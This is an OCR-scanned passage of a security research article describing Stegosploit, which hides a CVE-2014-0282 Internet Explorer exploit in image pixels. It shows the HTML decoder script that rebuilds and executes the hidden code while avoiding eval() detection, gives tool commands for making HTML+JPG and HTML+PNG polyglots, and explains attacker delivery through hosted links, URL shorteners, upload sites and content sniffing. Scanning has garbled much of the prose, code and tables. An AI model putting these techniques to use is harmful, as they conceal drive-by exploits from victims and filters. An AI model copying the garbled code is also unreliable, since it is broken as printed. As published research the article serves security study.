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7.2.1 Encoding the Exploit Code 



Steganography is a well established science. There 
are several steganography algorithms that not only 
avoid visual detection but also provide error correc- 
tion and the ability to survive basic image transfor- 
mation. Popular algorithms such as F5 34 have been 
implemented in Javascript. 35 However, we will use 
very basic steganography to keep the decoder code 
compact and simple. 

An image is essentially an array of pixels. Each 
pixel can have three channels: Red, Green, and 
Blue. Each channel is represented by an 8-bit value, 
which provides 256 discrete levels of color. Some 
images also have a fourth channel, called the alpha 
channel, which is used for pixel transparency. We 
shall restrict ourselves to using only the R, G, and 
B channels. A black and white image uses the same 
values for R, G, and B channels for each pixel. 

Let us, for simplicity's sake, consider black and 
white images to start with. Keeping in mind 8-bit 
grayscale values, we can visualize an image to be 
composed of 8 separate bit layers. Bit layer 0 is an 
image formed by values of the least significant bit 
(LSB) of the pixels. Bit layer 1 is formed by values 
of the second least significant pixel bit. Bit layer 7 is 
formed by values of the most significant bit (MSB) 
of all the pixels. 



Kevin's image can be decomposed into 8-bit lay- 
ers as shown in the following images. 




http : //f 5- steganography . googlecode . com/files, 
'https : //github . com/desudesutalk/ j s- jpeg-steg 




Note that the images are equalized to show the 
presence and absence of pixel bits. Bit layer 7 con- 
tributes the maximum information to the image. It 
is akin to the broad outlines of a painting. As we 
step down through the bit layers, the information 
contributed to the image decreases, but the level of 
detail increases. Bit layer 0 in isolation looks like 
noise and contributes to the finer shade variations 
in the overall image. 

Think of the bit layers as transparent sheets. 
When they are superimposed together, they will re- 
sult in the complete image. The exploit code shall 
be written on one of these transparent sheets. First, 
the exploit code is converted to a bit stream. Each 
bit from the exploit bit stream is written onto the 
bit in the image's bit layer. The bit layers are then 
superimposed together to create an image, one that 
contains the exploit code encoded in its pixels. En- 
coding the exploit bit stream on higher bit layers 
will result in significant visual distortion of the re- 
sultant image. The goal is to encode the exploit bit 
stream into lower bit layers, preferably bit layer 0 
which comprises of the LSB of all the pixels. 

For comparison, here are two resultant images, 
with the exploit bit stream encoded on bit layer 7 
versus bit layer 2. The pixel encoding is exagger- 
ated using red pixels for l's and black pixels for O's 
encoded in a 3 x 3 grid. 

;anography . pdf 
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The resultant image, when the bitstream is en- 
coded on bit layer 2, shows little or no visual aber- 
ration, even close up. 

JPG images are compressed using a discrete co- 
sine transform (DCT) based lossy compression algo- 
rithm. A pixel may be approximated to its nearest 
neighbor for better compression at the cost of image 
entropy and detail. The resultant visual degradation 
would be negligible, but the loss of pixel data intro- 
duces significant errors in steganographic message 
recovery. To overcome pixel loss of JPG encoding, 
we shall use an iterative encoding technique, which 
shall result in an error-free decoding of the encoded 
bit stream. 

"Exploring JPEG" is an aptly named article that 
provides detailed explanation of how JPG files com- 
press image data. 36 

7.2.2 Iterative Encoding for JPG Images 

JPG encoders can use variable quality settings. Low 
quality offers maximum compression. However, the 
maximum quality level does not provide us with loss- 

36 https: / /www. imperialviolet.org/binary/jpeg/ 



less compression. Certain pixels will still be approx- 
imated no matter what, even if we use the highest 
possible encoding quality level. To further minimize 
pixel approximation, we shall not encode the ex- 
ploit bit stream on consecutive pixels, but rather in 
a pixel grid with every nth pixel in rows and columns 
being used for encoding the bit stream. Pixel grids 
of 3 x 3 and 4x4 perform much better compared to 
encoding on every consecutive pixel. Increased pixel 
grid dimensions do not make for lower errors. 

The encoding process can be represented as fol- 
lows. 

• Let / be the source image. 

• Let M be the message to be encoded on a given 
bit layer of image /. 

• Let ENCODE be the steganographic encoder 
function, and let DECODE be the stegano- 
graphic decoder function. 

• Let b be the number of the bit layer (0-7). 

• Let J be the JPG encoder function. 

By encoding message M onto image /, we shall 
obtain resultant image i 7 , as follows: 

I' = J(ENCODE(I, M, b)) 

Upon decoding image V we shall obtain a resul- 
tant message M', as follows: 

M' = DECODER' \b) 

For JPG images, M' is not equal to M. Let A 
be the error between the original and resultant mes- 
sage. 

A = M - M' 

Our goal is to get A = 0. If we re-encode the 
original message M on resultant image V \ we shall 
obtain a new image I": 

I" = J(ENCODE(I', M, b)) 
Decoding I" will result in message M" as follows: 

M" = DECODER", b) 
A' = M - M" 
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If A' < A, then we can assume that the encod- 
ing process shall converge, and after N iterations, we 
will get an error- free decoded message and A = 0. 

Note: since the encoding and decoding processes 
operate on discrete pixels, certain situations result 
in non-convergence with neighboring pixels flipping 
alternately like Conway's Game of Life. The number 
of passes required for convergence depends upon the 
encoder used in the JPG processor library. 

Stegosploit's iterative encoder tool iterative_- 
encoder.html uses the browser's built in JPG pro- 
cessor library via HTML5 CANVAS. All stegano- 
graphic encoding is performed in-browser using 
CANVAS. Browsers use different JPG processor 
libraries. A steganographically generated JPG 
from Firefox will not accurately decode in Inter- 
net Explorer, and vice versa. A future goal is 
to achieve cross-browser JPG steganography com- 
patibility. For now, PNG provides cross-browser 
steganography compatibility because it employs 
lossless compression. Therefore, for CVE-2014- 
0282, we shall use IE9 to perform the steganographic 
encoding. 

7.2.3 A Few Notes on Encoding on JPG us- 
ing CANVAS 

All Stegosploit tools use HTML5 CANVAS for im- 
age analysis, encoding, and decoding. Here are some 
of the finer points to be kept in mind for using or 
extending the tools. 

Note: These observations are based on encoding 
that involved messages averaging 2500 bytes in size, 
the average size of a typical minified and compacted 
browser exploit. 

iterative_encoding.html generates JPG 
images using the toDataURL (" image/ j peg" , 
quality). The quality parameter is a value be- 
tween 0 and 1. As mentioned earlier, a value of 
1 does not imply lossless encoding. By default, 
iterative_encoding.html keeps the quality value 
as 1. Reducing the quality value increases the pixel 
deviation with each encoding round, prolonging 
the convergence, and in some cases not leading to 
convergence at all. The quality of encoding also de- 
pends upon whether the encoder uses software-only 
encoding or hardware assisted encoding. Float- 
ing point precision, make and model of GPU, and 
JPG libraries across different platforms contribute 
to minor errors when encoding and decoding across 

37 Stack Overflow, "Strange issue with Canvas in Internet E 
text?" 



browsers. 

I have found that encoding at bit layer 0 and 1 
usually never results into convergence when it comes 
to JPG. My tests were performed with IE9 and Fire- 
fox 21. Bit layers 2 and 3 have shown more success 
when it comes to encoding, especially on IE. Bit 
layer 5 and above result in noticeable visual aberra- 
tion of the encoded image. 

A pixel grid of 3 x 3 is preferred for the encod- 
ing process. This implies 1 bit for every 9 pixels in 
the image. Higher pixel grids yield faster conver- 
gence and less visual degradation. The JPG DCT 
algorithm encodes 8x8 pixel squares at a time. It 
doesn't make sense to use a pixel grid larger than 
8x8. 

I encountered unusual errors when encoding 
larger images. The pixel array of the CANVAS ap- 
peared to be truncated beyond a certain dimension. 
For example, encoding was successful on 1024x768 
pixel images, but completely fell apart on 1280x850 
pixel images. While I have not tested the operating 
limit in terms of dimensions, a discussion on Stack 
Overflow 37 seems to indicate that IE might limit 
CANVAS memory to 20MB. 

Color images can be thought of as composite im- 
ages derived from three channels: Red, Green, and 
Blue. Each image can therefore be visualized as be- 
ing decomposed into three channels, and each chan- 
nel is further decomposed into 8-bit layers. We can 
choose to encode on any one of the 24 image layers. 

Firefox's JPG encoder outperforms IE's JPG en- 
coder when it comes to color images. IE's JPG en- 
coder does not usually converge when encoding at 
bit layers below 3. 

Stegosploit's encoding process only affects the 
pixel data stored with the JPG file. All other meta- 
data including EXIF tags do not affect the encod- 
ing/decoding process. Encoded images generated 
from iterative_encoding.html do not retain any 
metadata present in the original image. This is be- 
cause toDataURI (" image/ j peg") generates entirely 
new JPG data. It is possible to copy the original 
JPG metadata back onto the encoded image using 
EXIF manipulation tools such as exif tool. 

$ exiftool — t agsFromFile source.JPG \ 
2 -all : all encoded .JPG 



Certain applications check for validity of images 

lorer 9, is there any constraint of width and size of canvas/con- 
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using metadata. Metadata adds more "legitimacy" 
to the steganographically encoded image. 

7.2.4 Encoding for PNG images 

PNG images store pixel data using lossless compres- 
sion. There is no approximation of pixels, and there- 
fore there is no loss of quality. HTML5 CANVAS 
has the ability to generate PNG images using the 
toDataURI ("image /png") method. 

iterative_encoding.html has the ability to 
auto-detect the source image type, based on its ex- 
tension, and use the appropriate encoding process. 

Encoding on PNG images has several advantages 
over JPG: 

The encoding process completes in a single pass. 
Encoding is possible at the lower layer, as the LSB, 
so no visual aberrations occur in the resulting im- 
age. Cross-browser decoding works accurately, and 
it is possible to encode in the alpha channel! 38 

7.3 Decoding the Exploit 

A steganographically encoded exploit is performed 
in roughly the following six steps. 

(1) Load the HTML containing the decoder 
Javascript in the browser. 

(2) The decoder HTML loads the image carrying 
the steganographically encoded exploit code. 

(3) The decoder Javascript creates a new canvas 
element. 

(4) Pixel data from the image is loaded into the 
canvas, and the parent image is destroyed from the 
DOM. From here onwards, the visible image is from 
the pixels in the canvas element. 

(5) The decoder script reconstructs the exploit 
code bitstream from the pixel values in the encoded 
bit layer. 

(6) The exploit code is reassembled into 
Javascript code from the decoded bitstream. 

(7) The exploit code is then executed as 
Javascript. If the browser is vulnerable, it will be 
compromised. 

7.3.1 Decoder for CVE-2014-0282 

By and large the function of decoding the stegano- 
graphically encoded exploit remains the same, but 
certain browser exploits need some extra support, by 



pre-populating certain elements in the DOM. CVE- 
2014-0282 is one such exploit that requires elements 
like <f orm>, <textarea>, < input > to be present in 
the DOM before triggering the Use-After-Free via 
Javascript. 

The HTML code containing the decoder script 
and other DOM elements required by CVE-2014- 
0282 is shown below in Figure 13. 

The HTML code is packed as tightly as possi- 
ble. There are several important factors to be noted, 
each serving a specific purpose. 

If IE9 does not detect the < IDOCTYPE html> dec- 
laration at the beginning of the HTML document, it 
switches over to Quirks Mode instead of Standards 
Mode. Without Standards Mode, canvas does not 
work, and our entire decoder process grinds to a 
halt. 

Fortunately, IE can be switched over to Stan- 
dards Mode using the X-UA-Compatible header as 
follows: 39 



<headXmeta http— equi v="X— UA— Compatible " 
content="IE=Edge "> 



The decoder script in Figure 13 performs the in- 
verse function of the encoder. The script requires 
three global variables that are hardcoded in the first 
line: 

bL Bit Layer. It has to match the bit layer used 
for encoding the bitstream. 

eC Encoding Channel. 0 = Red, 1 = Green, 2 = 
Blue, 3 = All Channels (grayscale) 

gr Pixel Grid. Here 3 implies a 3x3 pixel grid, 
the same grid used in the encoding process. 

The script ends by invoking the function exc() 
with the reconstructed exploit Javascript string. 

The most obvious way of executing Javascript 
code represented as a string would be to use the 
eval() function. eval(), however, gets flagged as 
potentially dangerous code. 

Another way of executing Javascript code from 
strings is to create a new anonymous Function ob- 
ject, with the Javascript string supplied as an ar- 
gument to its constructor. The resultant Function 
object can then be invoked to the same effect as 
evalQing the string. 



38 Note that iterative_encoding.html doesn't support this yet. 

39 https : //msdn. micro soft . com/en-us/library/ j j676915°/ 0 28v=vs . 85°/ 0 29 . aspx 
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1 function exc(b){var a=set Timeout (( new 

Function(b)) ,100) } window . onload=i0 ; 

</scr ipt > 



Hat tip to Dr. Mario Heiderich for first discover- 
ing this technique. 

When delivering exploits in style, the rendered 
view has to appear neat and clean. Extra DOM el- 
ements required for the Use- After-Free bug should 
not clutter the display. An extra < style > tag in- 
serted into the HTML allows us to selectively display 
only the image, and hide everything else by default. 

<st y le >body { visibility : hidden;} . s{ 

visibility : visible ; position : absolute ;top 
:15p 

2 x; left : 10px;}</style ></head> 



The above CSS style sets the contents of body as 
hidden. Only elements with style class s will be dis- 
played. The following DOM elements required for 
the Use- After-Free are all hidden from view: 

<bodyXform id=fmXtext area id=c value=al></ 
textareaXinput id=c2 type=checkbox 
2 name=o2 value=" a2 ">Test check<BrXtextarea 
id=c3 value=" a2 "></textareaXinput 
type=text name=t 1 ></form> 



Only the image is visible, since it is wrapped 
within a <div> tag with CSS class s applied to it. 
Note the source of the image is set to #, which re- 
sults into the current document URL. We shall see 
the usefulness of this trick when we discuss polyglot 
documents in a later section. 

1 <div class=sXimg id=px src="#"></div> 
</body></html> 



7.3.2 Exploit Delivery - Take 1 

At this stage, we have the components necessary to 
deliver the exploit: (1) the HTML page containing 
the decoder and (2) the exploit code steganograph- 
ically encoded in a JPG file. 

Individual inspection of the above two compo- 
nents would reveal nothing suspicious. The decoder 

40 http : //conference . hitb . org/hitbsecconf 2015ams/sessi 
41 http : //www . slideshare . net /saumil shah/ deadly-pixels-: 



Javascript contains no potentially offensive content. 
Its code simply manipulates canvas pixels and ar- 
rays. 

The encoded JPG file also carries no offensive 
strings. All the exploit code— the shellcode, the 
ROP chain, the Use- After-Free trigger— is now em- 
bedded as bits in pixels. 

Earlier versions of Stegosploit, like the one 
demonstrated at SyScan 2015 Singapore used these 
two separate components to deliver the exploit. 

The current version of Stegosploit— vO. 2, demon- 
strated at HITB 2015 Amsterdam— combines the de- 
coder HTML and the steganographically encoded 
image into a single container. 40 If opened in an im- 
age viewer, the contents show a perfectly valid JPG 
image. If loaded into a browser, the contents ren- 
der as an HTML document, invoking the decoder 
code and triggering the exploit, while still showing 
the image (itself) in the browser! 

This is a polyglot document. For a detailed dis- 
cussion on polyglots, please read up the excellent 
write-up by Ange Albertini in PoC||GTFO 7:6. 

7.4 HTML+Image = Polyglot 

The final product of Stegosploit is a single JPG im- 
age that will trigger the CVE-2014-0282 Use- After- 
Free vulnerability in IE, when loaded in the browser. 
Before we get to the mechanics of HTML+JPG 
polyglots, we shall take a look at the origins of 
browser-based polyglots. 

7.4.1 IMAJS - Early Work 

I first started exploring browser-based polyglots in 
2012, trying to combine data formats that are loaded 
and parsed by browsers. The end result was IMAJS, 
a successful polyglot of a GIF image and Javascript. 
The IMAJS technique could also be applied on BMP 
files. I presented IMAJS polyglots in my talk titled 
"Deadly Pixels" at NoSuchCon 2013. 41 

GIF files always begin with the magic marker 
GIF89a. The idea here is to create a valid GIF im- 
age that contains Javascript appended at its end. 

When interpreting it as Javascript, it should 
translate to a variable assignment such as GIF89a 
= "stegosploit";. However, when rendering it as 
an image, it should generate a proper image. 

The first ten bytes of every GIF file are as fol- 
lows, where HH HH and WW WW are 16-bit values. 

;/ stegosploit -hacking-with-pictures/ 
:-2013 
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47 


49 


46 


38 39 61 


HH HH 


WW 


G 


I 


F 


8 9a 


height 


width 



If we set the height to 0x2 A2F, it translates to /*, 
which is a Javascript comment. The width could be 
anything. Most browsers, honouring Postel's Law, 
will still render a proper image. 

The following is an example of an IMAJS GIF 
file (GIF+JS), which will pop up a Javascript alert 
if loaded in a <script> tag: 



GIF89a/* 


. . . . ( GIF image data) 


. . . */-" 


pwned " 


alert (Date () ) ; 





IMAJS BMP (BMP+JS) is also similar. 
BMP Header: 



42 4D XX XX XX XX 00 00 00 00 

B M Filesize Empty Empty DIB data 



The file size is now set to 2F 2A XX XX. At the 
end of the BMP data, we append our Javascript 
code. Even though the file size is inaccurate, all 
browsers properly render the image. 



BM/* (BMP image data ) . . 


■ ■ ■ */ — "pwned" ; 


alert ( Date ( ) ) ; 





Polyglot maestro Ange Albertini has some more 
examples on Corkami. 42 

IMAJS GIF or IMAJS BMP could be used to 
wrap the HTML decoder script, described in Fig- 
ure 13, in an image. Exploit delivery could there- 
fore be accomplished using only two images: one 
image containing the decoder script, while the other 
holds the steganographically encoded exploit code. 
Stylish, but not enough. 



HTML directly when loaded and execute any em- 
bedded Javascript code along the way. If the same 
data is loaded within an <img src="#"> tag, the 
browser will render the image in its display, as men- 
tioned earlier in this article. 

Basic JPG file structure follows the JPEG File 
Interchange Format (JFIF). JFIF files contain 
several segments, each identified by the two-byte 
marker FF xx followed by the segment's data. Some 
popular segment markers are listed in the following 
table. 



l 

3 
5 

7 
9 
11 
13 

15 



Marker 


Code 


Name 


FF D8 


SOI 


Start Of Image 


FF E0 


APP0 


JFIF File 


FF DB 


DQT 


Define Quantization Table 


FF CO 


SOF 


Start Of Frame 


FF C4 


DHT 


Define Huffman Table 


FF DA 


SOS 


Start Of Scan 


FF D9 


EOI 


End Of Image 



Every JPG file must begin with a SOI segment, 
which is just two bytes, FF D8. The APP0 segment 
immediately follows the SOI segment. The format 
of the JFIF header is as follows: 



typedef struct 

BYTE SOI [2] ; 
BYTE APP0 [ 2 ] ; 
BYTE Length [2] ; 



JFIFHeader { 

// FF D8 



marker 
BYTE Identifier 
BYTE Version [2] ; 
BYTE Units ; 



5];, 



FF E0 

Length of APP0 field 
excluding APP0 

"JFIF\0" 
Major, Minor 
0 = no units 



BYTE Xdensity [2] ; 
BYTE Ydensity [2] ; 
BYTE XThumbnail; 
BYTE YThumbnail; 

; 

} JFIFHEAD; 



// 
// 



1 = pixels per inch 

2 = pixels per cm 
// Horiz Pixel Density 
// Vert Pixel Density 
// Thumb Width ( if any) 
// Thumb Height ( if any 



7.4.2 Combining HTML in JPG files 

The first step towards single image exploit delivery 
is to combine HTML code in the steganographically 
encoded JPG file, turning it into a perfectly valid 
HTML file. 

Mixing HTML data in JPG has an advan- 
tage over the IMAJS techniques described in Sec- 
tion 7.4.1. The image does not need to be loaded 
via a <script> tag. The browser will render the 



The Stegosploit Toolkit includes a utility called 
jpegdump.c to enumerate segments in a JPG file. 
Using jpegdump on the steganographically encoded 
image of Kevin McPeake shows the following results: 



jpegdump kevin_encoded.jpg 

marker 0xffd8 SOI at offset 0 (start 
of image) 

marker OxffeO APP0 at offset 2 ( 
application data section 0) 



2 https : / / github . com/shrz/ corkami/tree/master/misc/ j spies 
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11 



13 



marker Oxffdb DQT at offset 20 (define 

quantization tables) 
marker Oxffdb DQT at offset 89 (define 

quantization tables) 
marker OxffcO SOF0 at offset 158 (start 

of frame (baseline jpeg)) 
marker 0xffc4 DHT at offset 177 (define 

huffman tables ) 
marker 0xffc4 DHT at offset 210 (define 

huffman tables ) 
marker 0xffc4 DHT at offset 393 (define 

huffman tables ) 
marker 0xffc4 DHT at offset 426 (define 

huffman tables ) 
marker Oxffda SOS at offset 609 (start 

of scan) 

marker 0xffd9 EOC at offset 182952 (end of 
codestream ) 



The contents of kevin_encoded. jpg can be rep- 
resented by the diagram on the left side of Figure 14. 

The most promising location to add extra con- 
tent is the APPO segment. Increasing the two- byte 
length field of APPO gives us extra space at the end 
of the segment in which to place the HTML decoder 
data, as shown on the right side of the figure. 

Stegosploit's html_in_jpg_ie.pl utility can be 
used to combine HTML data within a JPG file. 



. / html_in_jpg_ie . pi decoder _ eve _ 20 14 _ 028 2 . 
html kevin_encoded.jpg kevin _ polyglot 



comments <-- and -->. In the above example, the 
<html> tag is placed at offset 0x0014, followed by a 
start HTML comment <! - - marker. The first block 
of random data ends with the HTML comment ter- 
minator -->. The contents of the HTML decoder 
code is written after the HTML comment termina- 
tor. At the end of the HTML decoder code, we shall 
put another start HTML comment <!-- marker to 
comment out the rest of the JPG file's data. 

There have been some extreme cases where the 
JPG file itself may contain an inadvertent HTML 
comment terminator -->. In such situations, we 
can use an illegal start-of- Javascript tag < script 
type=text/undef ined> at the end of the decoder 
code. This script tag is deliberately not termi- 
nated. The DOM renderer will ignore everything fol- 
lowing <script type=text/undef ined> for HTML 
rendering. Since the Javascript type is set to 
text/undefined, no valid Javascript or VBScript 
interpreter will run the code contained in this open 
script tag. 

7.4.4 Combining HTML in PNG files 

Generating an HTML+PNG polyglot can be done 
using a technique similar to HTML+JPG polyglots. 
We have to inspect the PNG file structure and figure 
out a safe way for embedding HTML content in it. 



The resultant kevin_polyglot file increases in 
size, successfully embedding the HTML data in the 
slack space artificially created at the end of the 
APPO segment. In the example below, the length of 
the APPO segment increases from 18 bytes to 12092 
bytes. The HTML decoder code shown in Figure 13 
is embedded between blocks of random data in the 
APPO segment from offset 0x0014 to 0x2f 3d. 

7.4.3 HTML/ JPEG Coexistance 

JPG decoders would have no problem in properly 
displaying the image contained in the HTML+JPG 
polyglot described above. Browsers, however, would 
encounter problems when trying to properly render 
HTML tags. The extra JPG data would end up pol- 
luting the DOM. If the JPG data contains symbols 
such as < or >, the browser may end up creating 
erroneous tags in the DOM, which can affect the 
execution of the decoder Javascript. 

To prevent JPG data from interfering with 
HTML, we can use a few strategically placed HTML 



7.4.5 PNG File Structure 

PNG files consist of an eight-byte PNG signature 
(89 50 4E 47 0D OA 1A OA) followed by several 
FourCC— Four Character Code— chunks. FourCC 
chunks are used in several multimedia formats. 

Each chunk consists of four parts: Length, a 
Chunk Type, the Chunk Data, and a 32-bit CRC. 
The Length is a 32-bit unsigned integer indicat- 
ing the size of only the Chunk Data field, while 
the Chunk Type is a 32-bit FourCC code such as 
IHDR, IDAT, or I END. The CRC is generated from 
the Chunk Type and Chunk Data, but does not in- 
clude the Length field. 

Stegosploit's pngenum.pl utility lets us explore 
chunks in a PNG file. Running it against a stegano- 
graphically encoded PNG file shows us the following 
results: 



$ pngenum.pl pinklock_encoded . png 

PNG Header : 89 50 4E 47 0D OA 1A OA - OK 
IHDR 13 bytes CRC: 0xE9828D3A (computed 0 
xE9828D3A) OK 
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<htmlXheadXmeta http-equi v="X-UA-Compatible " cont ent=" IE=Edge "> 
<script>var bL = 2,eC = 3,gr =3; function iO () {px . onclick=dID} function dID(){var b=do 
cument . createElement ( " canvas " ) ; px . parent Node . insertBefore(b, px) ; b . width=px . widt 
h ; b . height=px . height ; var m=b .getContext("2d") ;m. drawlmage (px , 0 ,0) ; px . parent Node 
.removeChild(px) ; var f^n. get I mage Data (0 ,0 , b . width ,b. height) . data;var h = [] ,j=0,g 
= 0;var c=function (p , o , u) {n=(u*b . width+o) *4; var z=l«bL;var s = (p [ n]&z )»bL ; var q 
= (p [n+l]&z )»bL ; var a=(p [ n+2]&z )»bL ; var t=Math . round (( s+q+a) /3) ; switch (eC) {cas 
e 0 : t=s ; break ; case 1 : t=q ; break ; case 2 : t=a ; break ;} return ( St ring . fromCharCode ( t+4 
8) ) } ; var k=funct ion ( a) { for ( var q=0,o = 0;o<a *8 ; o++){h [q++]=c ( f , j , g) ; j+=gr ; i f ( j >=b 
. width) {j =0;g+=gr }}};k(6) ; var d=parselnt (bTS(h. join (""))); k(d) ; try { Collect Garba 
ge () } catch (e) {}exc (bTS(h. j oin ("")))} function bTS(b) {var a=" " ; for ( i =0;i<b. length 
; i +=8)a+=St r ing . fromCharCode (parselnt (b. substr (i ,8) ,2) ) ; return (a)jfunction exc( 
b){var a=setTimeout ( ( new Function(b)) , 100) jwindow . onload=i0 ;</ script > 
<st y le >body { visibility : hidden;} . sjvisibility : visible ; position : absolute ;top:15p 
x; left :10px;}</style ></head> 

<bodyXform id=fmXtext area id=c value=al></textareaXinput id=c2 type=checkbox 

name=o2 value=" a2 ">Test check<BrXt ext area id=c3 value="a2 "></textareaXinput 
type=text name=t 1 ></form> 
<div class=sXimg id=px src="#"x/div> 
</bodyX/html> 



Figure 13: Decoder Script and DOM Elements to exploit CVE-2014-0282 
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Figure 14: Structure of a JPEG (left) and JPEG+HTML (right). 
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Figure 15: PNG Structure (left) and PNG+HTML Structure (right). 
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Figure 16: JPEG Dump of a Polyglot 
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IDAT 8192 bytes CRC: 0xEDBlABB8 (computed 0 

XEDB1ABB8) OK 
IDAT 8192 bytes CRC: 0x7BA5829E (computed 0 

x7BA5829E) OK 
IDAT 8192 bytes CRC: 0xFDF71282 (computed 0 

xFDF71282) OK 

IDAT 8192 bytes CRC: 0x3AlBE893 (computed 0 

X3A1BE893) OK 
IDAT 8192 bytes CRC: 0x3C9B69C5 (computed 0 

x3C9B69C5) OK 
IDAT 8192 bytes CRC: 0x8E2E6D15 (computed 0 

x8E2E6D15) OK 
IDAT 2920 bytes CRC: 0xAE102222 (computed 0 

xAE102222) OK 
IEND 0 bytes CRC: 0xAE426082 (computed 0 

xAE426082) OK 



Each PNG file must contain one IHDR chunk, the 
image header. Image data is encoded in multiple 
IDAT chunks. Each PNG file must terminate with 
an IEND chunk. 

PNG files are easier to extend than JPG files. We 
can simply insert extra PNG chunks. PNG provides 
informational chunks such as tEXt chunks that may 
be used to contain image metadata. We can insert 
tEXt chunks immediately after the IHDR chunk. 

tEXt chunks are basically name- value pairs, sep- 
arated by a NULL byte 0x00. A tEXt chunk looks 
like this: 

[length] [tEXt] [ name\x00Saumil Shah] [CRC] 



An approach taken by Cody Brocious (@daeken) 
explores compressing Javascript code into PNG im- 
ages in his article, "Superpacking JS demos" 43 . 

We shall take a slightly different approach, which 
does not involve using illegal PNG chunks, preserv- 
ing the validity of the PNG file and not raising any 
suspicions. The right side of Figure 15 shows how 
to embed HTML data within PNG files. 

Stegosploit's html_in_png.pl utility can be 
used to combine HTML data within a PNG file. 

$ ./html_in_png. pi decoder_cve_2014_0282 . 
html pinklock_encoded . png 
pinklock_polyglot 



Figure 17 presents the output of pngenum.pl run 
on this file. 

This concludes our discussion on HTML+JPG 
and HTML+PNG polyglots for the time being. 

43 http : / / daeken . com/superpacking- j s -demos 



Next we shall explore delivery techniques for these 
polyglots, so that these "images" will auto-run when 
loaded in the browser. 

7.5 HTTP Transport 

In Section 7.3.2, we established the need for the use 
of HTML+Image polyglots to achieve our objective 
of exploits delivered via a single image. We explored 
how to prepare HTML+JPG and HTML+PNG 
polyglots in Section 7.4. 

This section provides a few insights into con- 
trolling some of the finer points of HTTP trans- 
port when it comes to delivering the polyglot to the 
browser. The primary goal is to enable the image 
polyglot to be rendered as HTML in the browser, al- 
lowing the embedded decoder script to execute when 
the document loads. The secondary goal is to avoid 
detection on the network. An interesting side effect 
of time-shifted exploit delivery will be discussed at 
the end of this section. 

Exploring the nuances of HTTP transport in it- 
self can be a very complex topic, so I shall keep the 
discussion restricted to only some relevant points. 

7.5.1 Reaching the Target Browser 

As an attacker, we have the three options for sending 
the HTML+Image polyglot to the victim's browser. 
(1) We can host the image on an attacker-controlled 
web server and send its URL to the victim. (2) We 
could host the entire exploit on a URL shortener. (3) 
We could upload the image to a third-party website 
and provide a direct link. 

It is also possible to combine this with a vast 
array of XSS vulnerabilities, but that is left to the 
reader's imagination and talent. 

Hosting drive-by exploit code on an attacker- 
controlled web server is the most popular of all 
HTTP delivery techniques. The HTML+Image 
polyglot can be hosted as a file with a JPG or PNG 
file extension, an extension not registered with the 
browser's default MIME types, or no file extension 
at all! 

For each case, the web server can be configured 
to deliver the Content-Type: text/html HTTP 
header to force the victim's browser to render the 
polyglot content as an HTML document. An ex- 
plicit Content -Type : header will override file ex- 
tension guessing in the browser. 
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Figure 17: PNG Dump of a Polyglot 
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URL shorteners can be abused far more than just 
hiding a URL behind redirects. My previous re- 
search, presented in a lightning talk at CanSecWest 
20 10, 44 shows how to host an entire exploit vec- 
tor +payload in a URL shortener. With Data URIs 
being adopted by most modern browsers, it is theo- 
retically possible to host a polyglot HTML+Image 
resource in a URL shortener. There are certain 
limits to the length of a URL that a browser will 
accept, but some clever work done by services like 
Hashify.me 45 suggest that this could be overcome. 

For additional tricks that an attacker can per- 
form with URL shorteners, please refer to my article 
in the HITB E-Zine Issue 003, titled "URL Shorten- 
ers Made My Day" 46 . 

Several web applications allow user-generated 
content to be hosted on their servers, with content 
white-listing. Blogs, user profile pictures, document 
sharing platforms, and some other sites allow this. 

Images are almost always accepted in such ap- 
plications because they pose no harm to the web 
application's integrity. Several of these applications 
store user-generated content on a separate content 
delivery server, a popular example being Amazon's 
S3. Stored user content can be directly linked via 
URLs pointing to the hosting server. 

As an example, I tried uploading 
kevin_polyglot to a document sharing applica- 
tion. The application stores my files on Amazon S3. 
The document can be referred via its direct link. 

The HTTP response received is as follows: 
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HTTP/1.1 200 OK 
x— amz— id —2: 

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
x-amz-request-id : 313373133731337 
Date: Fri , 05 Jim 2015 11:48:57 GMT 
Last-Modified: Wed, 03 Jun 2015 09:07:32 GMT 
E t ag : "BADC0DEBADC0DEBADC0DE" 
x— amz— server —side —encrypt ion : AES256 
Accept— Ranges : bytes 

Content— Type : application / octet— stream 
Content-Length : 195034 
Server : AmazonS3 



When loaded in Internet Explorer, the browser, 
noticing that there is no file extension, pro- 
ceeds to guess the data type of the content via 



Content Sniffing, overriding the Content-Type: 
application/octet-stream header. IE identifies 
the polyglot content as an HTML document, notic- 
ing the presence of <html>< ! - - in the early parts of 
the JPG APP0 segment, as discussed in Section 7.4.3. 

Soroush Dalili's excellent presentation "File in 
the hole!" covers several techniques of abusing file 
uploaders used by web applications. 47 In his talk, he 
discusses using double extensions (file.html; . jpg 
on IIS or file .html .xyz on Apache), using 
ghost extensions (file .html °/ 0 00 . jpg on FCKedi- 
tor), trailing null bytes, and case-sensitivity quirks 
to abuse file uploaders. 

7.5.2 Content Sniffing 

A polyglot's greatest advantage, other than evading 
detection, is that it can be rendered in more than 
one context. For example, an image viewer appli- 
cation that supports multiple image formats would 
detect the type of image-based on the file extension. 
In the absence of an extension, the image viewer re- 
lies on the file's magic numbers and header structure 
to determine the image type. 

Browsers are far more complex beasts and are re- 
quired to handle a variety of different data formats: 
HTML, Javascript, Images, CSS, PDF, audio, video; 
the list goes on. Browsers rely upon two key factors 
for determining the type of content, and thereby in- 
voking the appropriate processor or renderer associ- 
ated with it. These are the resource extension and 
the HTTP Content -Type response header 

In the absence of known extensions or a 
Content -Type header, browsers ideally would sim- 
ply offer a raw data dump of the content for the 
user to download. However, over the course of years, 
browsers have tried to implement automatic content 
guessing, called Content Sniffing. 

Michal Zalewski is perhaps one of the leading au- 
thorities in analyzing browser behavior from a secu- 
rity perspective. In his excellent "Browser Security 
Handbook" Zalewski provides a detailed discussion 
on Content Sniffing techniques employed by various 
browsers. 48 

Figure 18, borrowed from Zalewski 's Browser Se- 
curity Handbook, summarizes the results of content 



44 http : //www . slideshare . net/ saumilshah/url- shorteners -made -my -day 
45 http: //hashify.me/ 

46 http: //magazine .hitb. org/issues/HITB-Ezine-Issue-003 .pdf 

47 http : //soroush . secpro j ect . com/downloadable/File°/o20in 0 /o20the 0 / 0 20hole ! . pdf 



8 https : //code . google . com/p/browsersec/wiki/Part2 
unzip pocorgtfo08.pdf browsersec.zip 
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Figure 18: Content Sniffing Matrix 



sniffing tests on various browsers. 

Content Sniffing is the ideal weakness for a poly- 
glot to exploit. Combining Content Sniffing tricks 
with delivery approaches discussed above opens up 
several creative attack delivery avenues. This is one 
of my topics for future research. 

